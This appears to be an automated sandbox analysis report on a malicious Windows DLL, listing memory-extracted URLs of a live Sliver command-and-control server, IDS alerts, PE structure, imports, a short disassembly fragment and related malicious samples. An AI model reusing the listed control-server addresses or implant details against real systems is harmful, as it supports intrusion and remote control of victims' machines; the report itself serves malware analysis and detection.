http://203.204.217.190:8092/namespaces/oauth/sign-up.html?dr=18845628&k=7303s814h1Mozilla/5.0 | rundll32.exe, 00000007.00000003.3672973285.000000000C902000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://h=75352k715&wh=HTTP/1.1tUser-Ageh=User-AgentUser-Agenth=75352k715&wh=Connection | rundll32.exe, 00000008.00000003.3674217974.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2661881087.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092r=3772_4761&so=584673b09/ | loaddll32.exe, 00000001.00000002.4225609264.000000000A494000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/oauth/oauth2callback/db/oauth2callback/api/oauth2/database/samples.php | rundll32.exe, 00000008.00000003.2451552262.000000000CEFA000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092/oauth2/database/api/php/samples.php | loaddll32.exe, 00000001.00000002.4220764521.000000000A1A2000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A1A2000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/api/oauth2callback/api/oauth2callback/database/database/php/api.html? | rundll32.exe, 00000005.00000002.4224807817.000000000CE86000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/db/oauth2/register.html?WinHttpGetDefaultProxyConfiguration4 | rundll32.exe, 00000006.00000002.4221390129.000000000CDDC000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/db/oauth2callback/namespaces/login.phphttps://203.204.217.190:8092/db/o | rundll32.exe, 00000006.00000002.4219849494.000000000CDAA000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2589121437.000000000CDAA000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://HTTP/1.1tUser-AgePOSTPOSITIONPRESANCTIFIEDAPRIORITYSITARISTSAUTOROUTEUser-AgentUser-AgentGAIL | regsvr32.exe, 00000004.00000003.3996365517.000000000CE34000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:80925 | rundll32.exe, 00000005.00000002.4211265707.00000000007EA000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092/http://203.204.217.190:8092 | rundll32.exe, 00000007.00000003.3671385890.000000000C9F4000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092/oauth2/oauth/db/api.php | regsvr32.exe, 00000004.00000003.3996528506.000000000CDF2000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092Upgrade-Insecure-Requestsx=19440630&xj=33556174CM_Get_Device_Interface_Li | rundll32.exe, 00000006.00000002.4214808976.000000000CCA0000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/ | rundll32.exe, 00000008.00000002.4214213422.000000000CC1A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3692594105.0000000000680000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092/db/api.html2006-01-02T15:04:05.999999999Z07:00 | rundll32.exe, 00000006.00000002.4212929021.000000000CC16000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092https://203.204.217.190:8092WinHttpGetDefaultProxyConfigurata | rundll32.exe, 00000006.00000003.2588879689.000000000CDC8000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092Upgrade-Insecure-Requestsbs=3q3556174&n=5l3348718same | loaddll32.exe, 00000001.00000002.4225609264.000000000A494000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092e=97374091&sa=63y379847 | regsvr32.exe, 00000004.00000002.4213969543.000000000CC8E000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.3998388511.000000000CC8E000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://HTTP/1.1tUser-AgeUser-AgentUser-Agentd= | loaddll32.exe, 00000001.00000002.4220764521.000000000A1AE000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092/db/oauth2/register.html | rundll32.exe, 00000006.00000002.4221390129.000000000CDDC000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092IRED | rundll32.exe, 00000008.00000002.4224327410.000000000CDF0000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://203.204.217.190:8092/oauth/database/namespaces/database/api/db/database/register.html? | rundll32.exe, 00000005.00000003.3835054805.000000000CD5C000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://203.204.217.190:8092 | rundll32.exe, 00000008.00000003.2661833618.000000000CE28000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4221030380.000000000CD22000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
                                                                                                                                                  unknown
                                                                                                                                                  https://203.204.217.190:8092/oauth2callback/oauth2callback/sign-up.html?rundll32.exe, 00000005.00000003.3834789569.000000000CDA2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4219138978.000000000CD24000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://HTTP/1.1trundll32.exe, 00000008.00000002.4214213422.000000000CC14000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://203.204.217.190:8092Upgrade-Insecure-Requestsrundll32.exe, 00000006.00000003.2589492198.000000000CD62000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3671385890.000000000C9F4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://203.204.217.190:8092/db/namespaces/signin.htmlrundll32.exe, 00000008.00000002.4214213422.000000000CC18000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://203.204.217.190:8092/php/signin.html?rundll32.exe, 00000007.00000002.4212133165.000000000C818000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://HTTP/1.1tUser-AgeUser-AgentUser-Agentrp=rundll32.exe, 00000008.00000002.4220443970.000000000CD0E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://203.204.217.190:8092/register.html?WinHttpGetDefaultProxyConfigurationloaddll32.exe, 00000001.00000002.4220764521.000000000A1A2000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A1A2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://203.204.217.190:8092_=82918870&eu=584673u09http://203.204.217.190:8092/rundll32.exe, 00000005.00000002.4221007051.000000000CD66000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://203.204.217.190:8092WinHttpGetDefaultProxyConfigurathttps://203.204.217.190:8092rundll32.exe, 00000008.00000002.4224327410.000000000CDF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://203.204.217.190:8092https://203.204.217.190:8092WinHttpGetDefaultProxyConfiguratcrundll32.exe, 00000005.00000003.3834672492.000000000CDC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://203.204.217.190:8092/oauth2callback/db/oauth2/php/api.phphttps://203.204.217.190:8092/oauth2regsvr32.exe, 00000004.00000002.4211857579.000000000CC20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://203.204.217.190:8092/database/database/db/database/login.phprundll32.exe, 00000008.00000002.4214213422.000000000CC20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://203.204.217.190:8092/db/oauth2callback/namespaces/login.htmlrundll32.exe, 00000006.00000002.4219849494.000000000CDAA000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2589121437.000000000CDAA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://203.204.217.190:8092/oauth2callback/oauth2callback/sign-up.phprundll32.exe, 00000005.00000003.3834789569.000000000CDA2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://203.204.217.190:8092https://203.204.217.190:8092WinHttpGetDefaultProxyConfiguratnregsvr32.exe, 00000004.00000003.3998918249.000000000CC1A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://203.204.217.190:8092/db/oauth2/register.html?f=4d9398139&qc=dl58467309rundll32.exe, 00000006.00000002.4212929021.000000000CC06000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3618422591.000000000CC06000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://203.204.217.190:8092/oauth/oauth2/oauth2/api/oauth/php/oauth2callback/rpc.html?rundll32.exe, 00000005.00000003.3835054805.000000000CD5C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://203.204.217.190:8092/oauth2/oauth/db/api.html?regsvr32.exe, 00000004.00000003.3996528506.000000000CDF2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://HTTP/1.1tUser-AgeUser-AgentUser-Agentn=unixgramn=56_849732&pi=ConnectionConnectionConnectionrundll32.exe, 00000008.00000002.4214213422.000000000CC14000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://203.204.217.190:8092/oauth2callback/oauth2callback/sign-up.html?AGE-SECRET-KEY-1M74AHG87SZUErundll32.exe, 00000005.00000002.4219138978.000000000CD24000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://203.204.217.190:8092/rpc.htmlrundll32.exe, 00000006.00000003.2589833273.000000000CD1A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://hm=6708kc6726&o=HTTP/1.1trundll32.exe, 00000007.00000002.4223588113.000000000CA74000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://203.204.217.190:8092http://203.204.217.190:8092loaddll32.exe, 00000001.00000002.4214235667.000000000A05A000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.4221656723.000000000CE04000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4224327410.000000000CDF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://203.204.217.190:8092/namespaces/oauth/sign-up.phprundll32.exe, 00000007.00000003.3671523760.000000000C9DC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://203.204.217.190:8092Mozilla/5.0regsvr32.exe, 00000004.00000002.4211857579.000000000CC06000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3835679098.000000000CD04000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4216612761.000000000CC80000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2663104353.000000000CCF6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4220443970.000000000CCF6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://203.204.217.190:8092/rpc.php.rundll32.exe, 00000006.00000003.2589897810.000000000CCFE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.phphttp://203.204.217.190:loaddll32.exe, 00000001.00000002.4223019198.000000000A298000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        http://203.204.217.190:8092/oauth2/database/api/php/samples.htmlloaddll32.exe, 00000001.00000002.4220764521.000000000A1A2000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A1A2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://203.204.217.190:8092/database/php/php/database/register.phphttps://203.204.217.190:8092/datarundll32.exe, 00000007.00000002.4214531173.000000000C8B2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.htmlloaddll32.exe, 00000001.00000002.4223019198.000000000A298000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://203.204.217.190:8092resourcerundll32.exe, 00000007.00000002.4212133165.000000000C81A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://203.204.217.190:8092/oauth/api/php/db/sign-up.htmlrundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  http://203.204.217.190:8092/db/api.htmlrundll32.exe, 00000006.00000002.4212929021.000000000CC16000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    unknown
IP | Domain | Country | ASN | ASN Name | Malicious
203.204.217.190 | unknown | Taiwan; Republic of China (ROC) | 9416 | MULTIMEDIA-AS-AP Hoshin Multimedia Center Inc, TW | true
                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                    Analysis ID:1520451
                                                                                                                                                                                                                    Start date and time:2024-09-27 11:18:26 +02:00
                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                    Overall analysis duration:0h 9m 44s
                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                    Sample name:5cPRapVOx6.dll
                                                                                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                                                                                    Original Sample Name:c994bb9982dd689598c6c261090a40cb.dll
                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                    Classification:mal96.troj.evad.winDLL@14/0@0/1
                                                                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                                                                    HCA Information:Failed
                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                    • Found application associated with file extension: .dll
                                                                                                                                                                                                                    • Override analysis time to 240s for rundll32
                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target loaddll32.exe, PID 7336 because there are no executed functions
• Execution Graph export aborted for target regsvr32.exe, PID 7472 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 7480 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 7488 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 7624 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 7664 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
                                                                                                                                                                                                                    • VT rate limit hit for: 5cPRapVOx6.dll
Time     | Type            | Description
05:20:27 | API Interceptor | 4x Sleep call for process: regsvr32.exe modified
05:20:27 | API Interceptor | 16x Sleep call for process: rundll32.exe modified
05:20:36 | API Interceptor | 4x Sleep call for process: loaddll32.exe modified
No context
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
MULTIMEDIA-AS-APHoshinMultimediaCenterIncTW | S1WVSiZOLX.elf | Get hash | malicious | Mirai, Moobot | Browse | • 182.234.15.33
 | SecuriteInfo.com.Linux.Siggen.9999.21080.24829.elf | Get hash | malicious | Mirai | Browse | • 111.184.160.75
 | 94.156.71.153-sparc-2024-08-29T17_31_55.elf | Get hash | malicious | Unknown | Browse | • 219.70.209.52
 | mirai.arm7.elf | Get hash | malicious | Mirai | Browse | • 219.68.92.130
 | firmware.sh4.elf | Get hash | malicious | Unknown | Browse | • 61.71.108.201
 | firmware.x86_64.elf | Get hash | malicious | Unknown | Browse | • 111.185.221.213
 | KKveTTgaAAsecNNaaaa.x86_64.elf | Get hash | malicious | Unknown | Browse | • 219.68.229.124
 | SecuriteInfo.com.Riskware.OfferCore.11979.8662.exe | Get hash | malicious | PrivateLoader, PureLog Stealer | Browse | • 58.114.252.42
 | unLc6VekkL.elf | Get hash | malicious | Mirai | Browse | • 61.70.85.150
 | wKrQaAEaJ4.elf | Get hash | malicious | Mirai | Browse | • 203.133.49.52
No context
No context
No created / dropped files found
File type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 6.2354339266289
TrID:
• Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
• Generic Win/DOS Executable (2004/3) 0.20%
• DOS Executable Generic (2002/1) 0.20%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 5cPRapVOx6.dll
File size: 16'616'960 bytes
MD5: c994bb9982dd689598c6c261090a40cb
SHA1: 484932042beb27bec5ab6d96df21ec1418c428a6
SHA256: fbce9fc010fdfb67da5ff95cc5a5d1dbb0c07950522f130b031e55831f81b060
SHA512: 32fa505bdca420313d62279874ac2ef1383a360502d73f0dfbe010913cc136c103159150b4706f46756e2d8cdea9a7442bc7d8c4cff58a67cfd869874044919b
SSDEEP: 196608:rcRl1WLHnSCf24VHfaRpamWwSOsPlebA:8CLkGMadfNgb
TLSH: 53F62894F8DB01B7DD0398308963612F1738794E9729DE97C6043F59E8737F20A76A2A
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...)..........................4h................................-T....@... ......................`.....
Icon Hash: 7ae282899bbab082
Entrypoint: 0x683413b0
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x68340000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks: 0x68d1a920, 0x68d1a8e0
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 1
File Version Major: 6
File Version Minor: 1
Subsystem Version Major: 6
Subsystem Version Minor: 1
Import Hash: 7d61210a06b412428471240387e6e605
Instruction
push ebp
mov ebp, esp
sub esp, 08h
mov dword ptr [69305AFCh], 00000000h
mov ecx, dword ptr [ebp+10h]
mov edx, dword ptr [ebp+0Ch]
mov eax, dword ptr [ebp+08h]
call 00007F6650FAF787h
leave
retn 000Ch
lea esi, dword ptr [esi+00000000h]
lea esi, dword ptr [esi+00000000h]
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword ptr [ebp+08h]
mov dword ptr [esp], 692C9000h
mov dword ptr [esp+04h], eax
call 00007F6651989F1Ch
leave
ret
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 68D55000h
call dword ptr [693071C0h]
sub esp, 04h
test eax, eax
je 00007F6650FAF9C5h
mov ebx, eax
mov dword ptr [esp], 68D55000h
call dword ptr [693071F0h]
mov edi, dword ptr [693071C8h]
sub esp, 04h
mov dword ptr [692C9010h], eax
mov dword ptr [esp+04h], 68D55013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 68D55029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [68D1D004h], eax
test esi, esi
je 00007F6650FAF963h
mov dword ptr [esp+04h], 692C9014h
mov dword ptr [esp], 692C70DCh
call esi
mov dword ptr [eax+eax], 00000000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0xfc6000 | 0xc8 | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xfc7000 | 0x948 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfca000 | 0x51abc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xf868a4 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xfc7180 | 0x144 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9db048 | 0x9db200 | cff07fee3e3abb1f94253f7e88172127 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x9dd000 | 0x375ec | 0x37600 | d45e0b3ccb02d504a2671a8c9f33c7a7 | False | 0.45202278498871334 | data | 5.528367190252391 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xa15000 | 0x571d60 | 0x571e00 | 61e8437aa5ca4443b2bcbd0fff678b6f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram | 0xf87000 | 0x1614 | 0x1800 | 913a94f020d2bfb5809620b952703ed6 | False | 0.3212890625 | data | 4.739076063356027 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss | 0xf89000 | 0x3cb50 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0xfc6000 | 0xc8 | 0x200 | e691d18e4a6e9a4aad43a47bd2efd969 | False | 0.3125 | data | 2.4343784802397503 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata | 0xfc7000 | 0x948 | 0xa00 | b624f79d63c0e351ca9d14ec0b3d66b9 | False | 0.40234375 | data | 4.892267560679928 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0xfc8000 | 0x2c | 0x200 | 48e8bfe3eb7ed13ef56d96cf035ca0d2 | False | 0.05859375 | data | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xfc9000 | 0x8 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0xfca000 | 0x51abc | 0x51c00 | a8046d900ee40c53dda86e817a9080b2 | False | 0.5279470087920489 | data | 6.586933434674035 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
KERNEL32.dll | AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileA, CreateIoCompletionPort, CreateThread, CreateWaitableTimerExW, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FreeEnvironmentStringsW, FreeLibrary, GetConsoleMode, GetEnvironmentStringsW, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetThreadContext, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, MultiByteToWideChar, PostQueuedCompletionStatus, ResumeThread, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetProcessPriorityBoost, SetThreadContext, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsGetValue, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WideCharToMultiByte, WriteConsoleW, WriteFile
msvcrt.dll | __mb_cur_max, _amsg_exit, _beginthread, _errno, _initterm, _iob, _lock, _unlock, abort, atoi, calloc, fputc, free, fwrite, localeconv, malloc, memcpy, memset, realloc, setlocale, strchr, strerror, strlen, strncmp, vfprintf, wcslen
Name | Ordinal | Address
DllInstall | 1 | 0x68d15140
DllRegisterServer | 2 | 0x68d15190
DllUnregisterServer | 3 | 0x68d151e0
StartW | 4 | 0x68d150a0
VoidFunc | 5 | 0x68d150f0
_cgo_dummy_export | 6 | 0x6930510c
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-27T11:20:30.598642+0200 | 2852655 | ETPRO MALWARE Sliver HTTP SessionInit Request | 1 | 192.168.2.4 | 49746 | 203.204.217.190 | 8092 | TCP
2024-09-27T11:20:30.688055+0200 | 2852655 | ETPRO MALWARE Sliver HTTP SessionInit Request | 1 | 192.168.2.4 | 49747 | 203.204.217.190 | 8092 | TCP
2024-09-27T11:20:30.688142+0200 | 2852653 | ETPRO MALWARE Sliver HTTP SessionInit Request | 1 | 192.168.2.4 | 49748 | 203.204.217.190 | 8092 | TCP
2024-09-27T11:20:33.570205+0200 | 2852658 | ETPRO MALWARE Sliver HTTP SessionInit Request | 1 | 192.168.2.4 | 49750 | 203.204.217.190 | 8092 | TCP
2024-09-27T11:20:36.250198+0200 | 2852655 | ETPRO MALWARE Sliver HTTP SessionInit Request | 1 | 192.168.2.4 | 49752 | 203.204.217.190 | 8092 | TCP
2024-09-27T11:20:39.329950+0200 | 2852654 | ETPRO MALWARE Sliver HTTP SessionInit Request | 1 | 192.168.2.4 | 49754 | 203.204.217.190 | 8092 | TCP
2024-09-27T11:22:34.774432+0200 | 2852653 | ETPRO MALWARE Sliver HTTP SessionInit Request | 1 | 192.168.2.4 | 49763 | 203.204.217.190 | 8092 | TCP
2024-09-27T11:22:35.047083+0200 | 2852657 | ETPRO MALWARE Sliver HTTP SessionInit Request | 1 | 192.168.2.4 | 49764 | 203.204.217.190 | 8092 | TCP
2024-09-27T11:22:37.076557+0200 | 2852653 | ETPRO MALWARE Sliver HTTP SessionInit Request | 1 | 192.168.2.4 | 49767 | 203.204.217.190 | 8092 | TCP
2024-09-27T11:22:38.064007+0200 | 2852658 | ETPRO MALWARE Sliver HTTP SessionInit Request | 1 | 192.168.2.4 | 49768 | 203.204.217.190 | 8092 | TCP
2024-09-27T11:22:41.381914+0200 | 2852652 | ETPRO MALWARE Sliver HTTP SessionInit Request | 1 | 192.168.2.4 | 49770 | 203.204.217.190 | 8092 | TCP
2024-09-27T11:22:43.596272+0200 | 2852655 | ETPRO MALWARE Sliver HTTP SessionInit Request | 1 | 192.168.2.4 | 49772 | 203.204.217.190 | 8092 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2024 11:19:26.470603943 CEST | 49730 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:26.475425005 CEST | 49731 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:26.475641012 CEST | 8082 | 49730 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:26.475786924 CEST | 49730 | 8082 | 192.168.2.4 | 203.204.217.190
